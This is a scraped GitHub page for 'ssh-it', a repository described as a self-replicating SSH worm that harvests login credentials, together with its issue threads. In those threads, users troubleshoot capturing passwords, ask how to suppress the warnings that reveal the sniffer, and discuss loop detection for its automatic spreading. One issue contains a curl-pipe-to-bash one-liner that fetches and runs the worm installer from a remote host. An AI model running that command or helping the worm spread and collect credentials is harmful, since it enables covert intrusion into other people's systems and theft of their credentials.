hackerschoice / ssh-it Goto Github PK
View Code? Open in Web Editor NEWSelf replicating and automatically spreading SSH worm that recovers login credentials
ssh-it's People
Contributors
Stargazers
Watchers
ssh-it's Issues
THC_NO_CONDOME=1 not working
leonardo
for start when I install ssh-it even using THC_NO_CONDOME=1
it sets env vars for debugging, which shows the user doing ssh that a sniffer is installed
I have to manually edit the seed file each time
from docs: THC_NO_CONDOME=1 -- Take off all safety and run SSH-IT in release mode (with no warnings)
but it doesn't work, the warnings still appear
SSH-IT doesn't work in Fedora
Hello.
I'm running a stock Fedora 36 system as a SSH client and as a SSH server (with SELinux enforced and permissive, it's the same)
When I start an standard password-based SSH session, I run some random commands and I exit, however, thc_list -r list shows "No logins captured" and there's no ".l" folder created. Moreover, it hasn't autorreplicated on the server. So, basically, it hasn't done anything.
Thanks a lot!
PD: Doing export THC_DEBUG=1 before executing the SSH client doesn't show anything different from not doing it
Issue when ~/.config does not exists?
User reported that 'it fails' if ~/.config does not exists.
SSH-IT works but doesn't fetch the password (in Fedora 36)
A picture is worth a thousand words
With THC_DEBUG=1, a regular SSH session looks like this:
I don't know if this issue is related to citronneur/pamspy#6 but it's the same behaviour.
Thanks!
berserker: Need better loop detection
doing everything just in memory without even touching /dev/shm is tricky and loop-detection wont work when the ssh-path branches:
A -> A is detected
A -> B -> A is detected
A -> B -> B is detected
A -> B -> C
A -> C is NOT detected.
This is because the LOOP-DB is only available OUTSIDE the main for-loop.
Changing this to marking a file in /dev/shm would fix this and also simplify parallel execution to speed up the berserker.
MY_TMPDIR mounted -noexec and error happens
THC_DEBUG=1 THC_NO_CONDOME=1 bash -c "$(curl -fsSL ssh-it.thc.org/x)"
DEBUG: THC_VERBOSE =
DEBUG: THC_TESTING =
DEBUG: THC_DEPTH = 6
DEBUG: THC_DEBUG = 1
DEBUG: THC_USELOCAL =
DEBUG: MY_TMPDIR = /tmp/.ssh-it-pkg-0
Downloading binaries........................................................[OK]
Unpacking binaries..........................................................[OK]
bash: line 237: ./hook.sh: Permission denied
DEBUG: Cleaning '/tmp/.ssh-it-pkg-0'
work around: prefix with MY_TMPDIR=/dev/shm
xxd: command not found
issue while installing ssh-it
-bash: xxd: command not found
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.